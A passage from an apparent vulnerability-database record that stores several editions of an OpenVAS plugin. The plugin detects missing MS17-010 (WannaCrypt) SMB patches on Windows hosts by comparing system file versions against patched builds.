'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win8_1:1, 
win8_1x64:1, win2012R2:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 8, "lastseen": "2020-01-08T13:43:59"}, {"bulletin": {"id": "OPENVAS:1361412562310810810", "hash": "60156663e73c7addaf6150e860b5a110684c2390a2cabe3fbb54677f875833f8", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": "2018-10-11T00:00:00", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2018-10-11T12:33:57", "history": [], "viewCount": 50, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810810", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms17-010.nasl 11835 2018-10-11 08:38:49Z mmartin $\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"$Revision: 11835 $\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-11 10:38:49 +0200 (Thu, 11 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n Microsoft Windows XP SP2 x64\n\n Microsoft Windows XP SP3 x86\n\n Microsoft Windows 8 x86/x64\n\n 
Microsoft Windows 10 x32/x64 Edition\n\n Microsoft Windows Server 2012 Edition\n\n Microsoft Windows Server 2016\n\n Microsoft Windows 8.1 x32/x64 Edition\n\n Microsoft Windows Server 2012 R2 Edition\n\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, win8x64:1,\n winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nvistVer = fetch_file_version(sysPath, file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n if(hotfix_check_sp(winVista:3, winVistax64:3, 
win2008:3, win2008x64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n\n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win8_1:1, 
win8_1x64:1, win2012R2:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nedgeVer = fetch_file_version(sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-10-11T12:33:57"}, {"bulletin": {"id": "OPENVAS:1361412562310810810", "hash": "38e265d4aaf23980eab47f1c2c0ea7a93e4a1f3d461b6ab773f1f134194b7f72", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": "2017-05-26T00:00:00", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2018-09-01T23:41:34", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810810", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms17-010.nasl 6225 2017-05-26 19:21:16Z cfi $\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389) \n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"$Revision: 6225 $\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-26 21:21:16 +0200 (Fri, 26 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Get the vulnerable file version and\n check appropriate patch is applied or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\n\n Impact Level: System\");\n script_tag(name:\"affected\", value:\"\n Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n Microsoft Windows XP SP2 x64\n\n Microsoft Windows XP SP3 
x86\n\n Microsoft Windows 8 x86/x64\n\n Microsoft Windows 10 x32/x64 Edition\n\n Microsoft Windows Server 2012 Edition\n\n Microsoft Windows Server 2016\n\n Microsoft Windows 8.1 x32/x64 Edition\n\n Microsoft Windows Server 2012 R2 Edition\n\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link,\n https://technet.microsoft.com/library/security/MS17-010\n http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name : \"URL\" , value : \"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name : \"URL\" , value : \"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name : \"URL\" , value : \"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nsysPath = \"\";\nsysVer = \"\";\n\n## Check for OS and Service Pack\n## Windows XP, server2003 and windows 8 support given due to the dispute over WannaCry Ransomware.\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, win8x64:1,\n winVista:3, win7:2, win7x64:2, 
win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\n##Fetch the version of files\nvistVer = fetch_file_version(sysPath, file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n ## Windows Vista and Server 2008\n if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n {\n ## Check for srv.sys version\n if(version_is_less(version:vistVer, test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n \n ## Windows XP\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n ## Check for srv.sys version, on 32bit xp sp3\n if(version_is_less(version:vistVer, test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## Windows 2003, Windows XP SP2 64bit\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## Windows 8\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n \n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' 
;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n ## Windows 7 and Windows Server 2008 R2\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n ## Windows Server 2012\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n ## Check for win32k.sys version\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n ## Windows 8.1 and Server 2012 R2\n else if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n {\n ## Check for win32k.sys version\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\n##Fetch the version of 'Edgehtml.dll'\nedgeVer = fetch_file_version(sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\n##Windows 10\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n ## Check for Edgehtml.dll version\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n ## Windows 10 Version 1511\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n ## Windows 10 version 1607 and Windows Server 2016\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = 
\"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2018-09-01T23:41:34"}, {"bulletin": {"id": "OPENVAS:1361412562310810810", "hash": "b929cc8244ede59aa0166be899f56de0d83e66157c656586c6395101b48f4ab9", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": "2019-05-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2019-05-29T18:34:05", "history": [], "viewCount": 2230, "enchantments": {"dependencies": {"modified": "2019-05-29T18:34:05", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": 
"mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-05-29T18:34:05", "value": 8.0, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810810", "sourceData": 
